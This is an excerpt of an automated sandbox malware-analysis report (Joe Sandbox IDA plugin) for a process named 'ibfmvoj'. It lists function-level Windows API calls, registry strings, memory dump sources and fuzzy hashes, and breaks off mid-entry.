                                                                                                                                                • Opcode Fuzzy Hash: 9e24f8ce75da09a248b20cc0b8c071a973126f9becfa49865a23222ceeaed76d
                                                                                                                                                • Instruction Fuzzy Hash: 3081AD32718B4292EB15EF26ED90569B3A0FB48BA4F844135CA4E83B54DF3CF565C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetFileVersionInfoSizeW.KERNELBASE ref: 00007FF7C0B955FE
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B95E5C), ref: 00007FF7C0B9560B
                                                                                                                                                • GetFileVersionInfoW.KERNELBASE ref: 00007FF7C0B95652
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B95E5C), ref: 00007FF7C0B956CE
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B95E5C), ref: 00007FF7C0B95738
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileInfoMultiVersionWide$ErrorLastSize
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4124070594-0
                                                                                                                                                • Opcode ID: e01c0beddb0a21be13c676d1829fd80cc06223eb7a0d0fdeb27590302d015e76
                                                                                                                                                • Instruction ID: 7ea5e85cabdefd6847fb9f6a4dac5bf7c88ea47ff54396b2264fd15bc52aad53
                                                                                                                                                • Opcode Fuzzy Hash: e01c0beddb0a21be13c676d1829fd80cc06223eb7a0d0fdeb27590302d015e76
                                                                                                                                                • Instruction Fuzzy Hash: 1C517422614A4286EB14DF35DD443A9A3A0FB45BB4FD48335EA2A87BD4DF3CE515C3A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiQueryValueWide$ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2750480488-0
                                                                                                                                                • Opcode ID: a2a956957d85d1160a1c1e75a8ff9ebabad4ec5ff4d62bef0ec57683f727d191
                                                                                                                                                • Instruction ID: c7815e989a76bd4c0db17e633ded3f16e4ea4f25ea4d17c1ccf052c99d0fcab5
                                                                                                                                                • Opcode Fuzzy Hash: a2a956957d85d1160a1c1e75a8ff9ebabad4ec5ff4d62bef0ec57683f727d191
                                                                                                                                                • Instruction Fuzzy Hash: 7B41A632618A8185E761DF2198403BAA3E0FB45BB8F944735EA5F86BD8CF3CE5648750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA1398
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA13EC
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA13F9
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA144B
                                                                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA146E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiOpenWide$ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2849162748-0
                                                                                                                                                • Opcode ID: f9f8151cbd7af3419927ac46581999f41de44eceef652958aeb7a6e100837b59
                                                                                                                                                • Instruction ID: 009b773d1b461fa1677d13966ec393c381c1e896e4dbde55aa505f722793e6fe
                                                                                                                                                • Opcode Fuzzy Hash: f9f8151cbd7af3419927ac46581999f41de44eceef652958aeb7a6e100837b59
                                                                                                                                                • Instruction Fuzzy Hash: AA31F532618B8185E761DF25AC0017AA2E5FB44BB4B844635EE9F87FD4CF3CE4618750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00007FF7C0BA134C: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA1398
                                                                                                                                                  • Part of subcall function 00007FF7C0BA134C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA13EC
                                                                                                                                                  • Part of subcall function 00007FF7C0BA134C: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA13F9
                                                                                                                                                  • Part of subcall function 00007FF7C0BA134C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA144B
                                                                                                                                                  • Part of subcall function 00007FF7C0BA134C: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA146E
                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 00007FF7C0B97077
                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 00007FF7C0B97087
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharCloseMultiOpenWide$ErrorLast
                                                                                                                                                • String ID: Enabled$Software\Microsoft\Windows Script Host\Settings
                                                                                                                                                • API String ID: 2932660033-4294085457
                                                                                                                                                • Opcode ID: da21a53021c49f3cd04686625ff5893b40543602bd74628a2b62cd772fdd219a
                                                                                                                                                • Instruction ID: 4f22d3cf7ff8b61b3c75796358bb3af9548d37d2a3e0b25e11f93dd6278b2c4b
                                                                                                                                                • Opcode Fuzzy Hash: da21a53021c49f3cd04686625ff5893b40543602bd74628a2b62cd772fdd219a
                                                                                                                                                • Instruction Fuzzy Hash: CD217532A18A4682EB11EF65EC501B9B361FB84760FC44235E94F86B99CF3CF554C7A4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$Openwcscat_s
                                                                                                                                                • String ID: \ScriptEngine
                                                                                                                                                • API String ID: 2126947803-4133095719
                                                                                                                                                • Opcode ID: 82bc82aaad09d417c185d7ad907f769e208dd6aa3d5ce9dbcaae8ec079bab233
                                                                                                                                                • Instruction ID: 60fb872ab4481b6eae36efa4a591c270773b52a30e9570e54d349c95037b3085
                                                                                                                                                • Opcode Fuzzy Hash: 82bc82aaad09d417c185d7ad907f769e208dd6aa3d5ce9dbcaae8ec079bab233
                                                                                                                                                • Instruction Fuzzy Hash: 0F216B25718A4541E721EF61EC4069AE394FF88B94FC04131EA9ED3B89CF3CE515CB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7C0B94DAE), ref: 00007FF7C0BA1682
                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,00007FF7C0B94DAE), ref: 00007FF7C0BA1722
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF7C0B94DAE), ref: 00007FF7C0BA1761
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7C0B94DAE), ref: 00007FF7C0BA176F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: QueryValue$ByteCharErrorLastMultiWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1671509117-0
                                                                                                                                                • Opcode ID: e8897c70192881227f46fa5e7c2528a0ac7a2b298b88f67da5d42a4b85716764
                                                                                                                                                • Instruction ID: 3876c570569d97b3b419beec050c784d71340677e5127061e1814aced704144f
                                                                                                                                                • Opcode Fuzzy Hash: e8897c70192881227f46fa5e7c2528a0ac7a2b298b88f67da5d42a4b85716764
                                                                                                                                                • Instruction Fuzzy Hash: AB41C532708A819AD751EF399C400A9B3E0FB44B74B888635EA5EC7BD8DF38F5608350
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Load$AllocByteCharMultiWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1944948655-0
                                                                                                                                                • Opcode ID: 9f1292a869813a12bafec8d47ba8f4a787ada246003ceb6b1154eafd291793ac
                                                                                                                                                • Instruction ID: 2e962f398dc4d716523e18e1ae297dee51c0c0cc7f04be0fac0fbcc3d0d252ab
                                                                                                                                                • Opcode Fuzzy Hash: 9f1292a869813a12bafec8d47ba8f4a787ada246003ceb6b1154eafd291793ac
                                                                                                                                                • Instruction Fuzzy Hash: A2115731A19B8281E761EF55EC512E6A2A0FF84B60FC44131D58EC2794DF3CF524CBA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,00007FF7C0B99C1D,?,?,?,?,?,?,?,00000000,?,00007FF7C0B94EDA), ref: 00007FF7C0BA0C4F
                                                                                                                                                • HeapFree.KERNEL32(?,?,?,00007FF7C0B99C1D,?,?,?,?,?,?,?,00000000,?,00007FF7C0B94EDA), ref: 00007FF7C0BA0C5D
                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,00007FF7C0B99C1D,?,?,?,?,?,?,?,00000000,?,00007FF7C0B94EDA), ref: 00007FF7C0BA0C84
                                                                                                                                                • RtlAllocateHeap.NTDLL ref: 00007FF7C0BA0C92
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$Process$AllocateFree
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 576844849-0
                                                                                                                                                • Opcode ID: 4f15d301f4691c65e617d7d94012a40ddb74ca9710d8a46f2515d79e9bc90b7a
                                                                                                                                                • Instruction ID: 0329c91b2d88f18f9d966abd339ca90ed6e36ea3883b420082e719593d901fe7
                                                                                                                                                • Opcode Fuzzy Hash: 4f15d301f4691c65e617d7d94012a40ddb74ca9710d8a46f2515d79e9bc90b7a
                                                                                                                                                • Instruction Fuzzy Hash: DB01A931F19B4282D715EF66A844029B691FB88BB0F548134DA5E83B54EF3CF8614794
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00007FF7C0BA3BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF7C0B92A4E), ref: 00007FF7C0BA3C21
                                                                                                                                                  • Part of subcall function 00007FF7C0BA3BF0: GetCurrentProcessId.KERNEL32(?,?,?,00007FF7C0B92A4E), ref: 00007FF7C0BA3C2F
                                                                                                                                                  • Part of subcall function 00007FF7C0BA3BF0: GetCurrentThreadId.KERNEL32 ref: 00007FF7C0BA3C3B
                                                                                                                                                  • Part of subcall function 00007FF7C0BA3BF0: GetTickCount.KERNEL32 ref: 00007FF7C0BA3C47
                                                                                                                                                  • Part of subcall function 00007FF7C0BA3BF0: GetTickCount.KERNEL32 ref: 00007FF7C0BA3C57
                                                                                                                                                  • Part of subcall function 00007FF7C0BA3BF0: QueryPerformanceCounter.KERNEL32(?,?,?,00007FF7C0B92A4E), ref: 00007FF7C0BA3C72
                                                                                                                                                • GetStartupInfoA.KERNEL32 ref: 00007FF7C0B92A7E
                                                                                                                                                • GetModuleHandleA.KERNEL32 ref: 00007FF7C0B92A86
                                                                                                                                                • GetModuleHandleA.KERNEL32 ref: 00007FF7C0B92A91
                                                                                                                                                  • Part of subcall function 00007FF7C0BA0E04: RtlInitializeCriticalSection.NTDLL ref: 00007FF7C0BA0E37
                                                                                                                                                  • Part of subcall function 00007FF7C0BA0E04: GetVersionExA.KERNEL32 ref: 00007FF7C0BA0E4B
                                                                                                                                                • ExitProcess.KERNEL32 ref: 00007FF7C0B92ADA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountCurrentHandleModuleProcessTickTime$CounterCriticalExitFileInfoInitializePerformanceQuerySectionStartupSystemThreadVersion
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3175086957-0
                                                                                                                                                • Opcode ID: e278e6fa2d7e27ded7967a1b59aa1e91490d423e65c45ba7cc01002927569202
                                                                                                                                                • Instruction ID: a3e402bbcabac63ffbe4259ff5f946740c530f2e20e6e0423e527050c3f1e685
                                                                                                                                                • Opcode Fuzzy Hash: e278e6fa2d7e27ded7967a1b59aa1e91490d423e65c45ba7cc01002927569202
                                                                                                                                                • Instruction Fuzzy Hash: 7011CE61E1894391EA15FF20EC552B8E361AF54370FC41032D50FC66A2EFBCF56A83A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00007FF7C0BA14A0: RegCreateKeyExW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA1502
                                                                                                                                                  • Part of subcall function 00007FF7C0BA1780: RegQueryValueExW.KERNELBASE ref: 00007FF7C0BA17D7
                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 00007FF7C0B9D2F4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateQueryValue
                                                                                                                                                • String ID: DisplayLogo$Timeout
                                                                                                                                                • API String ID: 4083198587-1251482861
                                                                                                                                                • Opcode ID: d901754219169ad41d1568d13db4bc5d7c99074eb0fa5d3685015a072fcd08e2
                                                                                                                                                • Instruction ID: 7ba4592ae9b06175169df92822db6200f4d1bb774f082f8ad87376ae4dcee83b
                                                                                                                                                • Opcode Fuzzy Hash: d901754219169ad41d1568d13db4bc5d7c99074eb0fa5d3685015a072fcd08e2
                                                                                                                                                • Instruction Fuzzy Hash: 5111872260868381EF01EF66E840269FB61EB95BA8F948035DA4FC7755DF2DE441C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Close$ChangeCreateErrorFindHandleLastNotificationSizeUnmapView
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2332896564-0
                                                                                                                                                • Opcode ID: 85e3b3f204752fd8c8503c89a3554d69240964dea804c02e62e4900dddc3e08b
                                                                                                                                                • Instruction ID: 5aa20ffe8fa8020daead266aafa5163288c7925663cb3420ea16bd1c2a44991a
                                                                                                                                                • Opcode Fuzzy Hash: 85e3b3f204752fd8c8503c89a3554d69240964dea804c02e62e4900dddc3e08b
                                                                                                                                                • Instruction Fuzzy Hash: 1B213A36604B4282E600EF16E844769E364FB85BB0F584231EB6E877D0DF78E855C790
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Alloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 143312630-0
                                                                                                                                                • Opcode ID: 6870eee8899fa617de8d89e375d47ea0904e1637a4c1b894673988ae1f61748e
                                                                                                                                                • Instruction ID: 1e0edb65a3af2330e2fae0ea48aa1ccce9f9e21a01324b059b0b0894d0d1e73a
                                                                                                                                                • Opcode Fuzzy Hash: 6870eee8899fa617de8d89e375d47ea0904e1637a4c1b894673988ae1f61748e
                                                                                                                                                • Instruction Fuzzy Hash: 56513936608B8286EB54EF26D840669B7B1FB88FA4F554035CE0E97764DF39F46183A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00007FF7C0B92AE4: GetCurrentThreadId.KERNEL32 ref: 00007FF7C0B92B7C
                                                                                                                                                • RtlDeleteCriticalSection.NTDLL ref: 00007FF7C0B9417E
                                                                                                                                                  • Part of subcall function 00007FF7C0B96FA8: RegCloseKey.ADVAPI32 ref: 00007FF7C0B97077
                                                                                                                                                  • Part of subcall function 00007FF7C0B96FA8: RegCloseKey.ADVAPI32 ref: 00007FF7C0B97087
                                                                                                                                                  • Part of subcall function 00007FF7C0B95BFC: GetACP.KERNEL32 ref: 00007FF7C0B95C58
                                                                                                                                                  • Part of subcall function 00007FF7C0B95BFC: LoadLibraryExW.KERNEL32 ref: 00007FF7C0B95CDA
                                                                                                                                                  • Part of subcall function 00007FF7C0B95BFC: GetProcAddress.KERNEL32 ref: 00007FF7C0B95CF2
                                                                                                                                                  • Part of subcall function 00007FF7C0B95BFC: FreeLibrary.KERNEL32 ref: 00007FF7C0B95D00
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseLibrary$AddressCriticalCurrentDeleteFreeLoadProcSectionThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3120584673-0
                                                                                                                                                • Opcode ID: 663cd7ab937ee375a1d675d57f1839723efb2fcf9d5bb5f33291d67a00986419
                                                                                                                                                • Instruction ID: 6079ef8c5de0f6633107e5306ff10b066610414e89bffa64c956f96bc2ed9c2e
                                                                                                                                                • Opcode Fuzzy Hash: 663cd7ab937ee375a1d675d57f1839723efb2fcf9d5bb5f33291d67a00986419
                                                                                                                                                • Instruction Fuzzy Hash: D5116321A2C6C252F761EF21EC547E9E664EB98354FC00035E64E82795DF7CF6448790
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$Value$ByteCharCreateMultiWide$ErrorFreeLastStringsprintf_s$FileLoadModuleNameOpenType
                                                                                                                                                • String ID: %d.%d$CLSID$LocalServer32$ProgID$TypeLib$Version
                                                                                                                                                • API String ID: 74125746-3122451186
                                                                                                                                                • Opcode ID: 8a81929ead2d3d370512f69584ac3dbfae35e2ef2b3b523af54e6a4d1e14e249
                                                                                                                                                • Instruction ID: 1e1cb4ecc05e85e9f4502e0b05fdb6dca6157d33a2309dca5244acb8654f74f3
                                                                                                                                                • Opcode Fuzzy Hash: 8a81929ead2d3d370512f69584ac3dbfae35e2ef2b3b523af54e6a4d1e14e249
                                                                                                                                                • Instruction Fuzzy Hash: 46227F36A08B4686EB11EF65D89456AA7B0FF88FA4F840131DE4E83B64DF3CE455C760
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
